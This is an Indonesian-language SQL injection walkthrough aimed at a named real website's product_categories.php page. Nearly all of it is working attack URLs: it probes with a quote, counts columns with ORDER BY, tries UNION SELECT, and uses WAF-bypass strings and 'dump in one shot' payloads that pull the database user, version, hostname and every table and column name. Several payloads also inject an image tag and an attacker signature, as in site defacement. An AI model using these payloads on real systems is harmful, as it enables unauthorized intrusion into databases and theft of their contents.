Solution Sql Injection Hard In Dios
Awal awal kita seperti biasa kasih query (') di belakang param
Jadinya : http//www.landp-farm.com/product_categories.php?id=31'
Kita coba pakai balance
Jadinya : http//www.landp-farm.com/product_categories.php?id=31%27--%20- (error)
%27nya coba kita ganti jadi%20
Nah jadi seperti semula (tidak error)
Kita coba order by 1
Jadinya : http//www.landp-farm.com/product_categories.php?id=31%20order%20by%201--%20-
Cari sampe error gan
Nah error nya di angka 13 berati column nya cuma sampai 12 doank
Kita coba union select
Jadinya : http://www.landp-farm.com/product_categories.php?id=31%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12--%20-
Waduh error:v kita coba pake waff gan
And%20.0UnIOn--%20-%0ASeLe%43t
Gw coba pake waff ini
Kembali seperti semula gan
Nah angka emas nya keluar gan ( 2 )
Kita coba pake dios
Jadinya : http://www.landp-farm.com/product_categories.php?id=31%20And%20.0UnIOn--%20-%0ASeLeCt%201,concat(0x3c696d67207372633d2268747470733a2f2f652e746f7034746f702e696f2f705f313735337370767936302e6a7067222077696474683d2233303022206865696768743d22333030223e,0x3c62723e,0x494e4a45434b20425920487378517858374033585f343033447c7c,0x3c62723e,current_user,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7,8,9,10,11,12--%20-
SELECT * FROM ck_cate _product WHERE cate_pro_id=
You have an error in your SQL syntax check the manual that corresponds to your MYSQL server version for the right syntax to use near " at line 1
Error gan,kita coba dios bypas waff
Jadinya : http://www.landp-farm.com/product_categories.php?id=31%20And%20.0UnIOn--%20-%0ASeLeCt%201,concat/**//**8**/(0x3c696d67207372633d2268747470733a2f2f652e746f7034746f702e696f2f705f313735337370767936302e6a7067222077696474683d2233303022206865696768743d22333030223e,0x3c62723e,0x4b6973736564427948737851785837,0x3c62723e,database/**//**8**/(),0x3c62723e,version/**//**8**/(),0x3c62723e,current_user,0x3c62723e,NOW(),0x3c62723e,/*!50000@@version_compile_os*/,0x3c62723e,@@hostname,0x3c62723e,/*!50000@@GLOBAL.have_ssl*/,0x3c62723e,/*!50000@@GLOBAL.have_symlink*/,0x3c62723e,/*!50000@@port*/,(select(@x)/*!50000from/**kontol**/*/(/*!50000select/**kontol**/*/(@x:=0x00),(select(0)/*!From/**kontol**/*/(/*!50000information_schema.columns/**kontol**/*/)/*!50000where/**kontol**/*/(table_schema=database/*kontol*//**kontol*/())and(0x00)in(@x:=/*!50000coNcat/**kontol**/*/(@x,0x3c6c693e,/*!50000table_name/**kontol**/*/,0x3a3a,/*!50000column_name/**kontol**/*/))))x)),3,4,5,6,7,8,9,10,11,12--%20-
SELECT * FROM ck_cate _product WHERE cate_pro_id=
You have an error in your SQL syntax check the manual that corresponds to your MYSQL server version for the right syntax to use near " at line 1
Error juga gan,kita coba racik dios nya
(SELECT+GROUP_CONCAT(0x3c62723e,table_name,0x3a3a,column_name)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE())
Kita coba pake dios ini...dan boom
Tinggal tambahin img+nick+version+database+user deh
Sekian terima kasih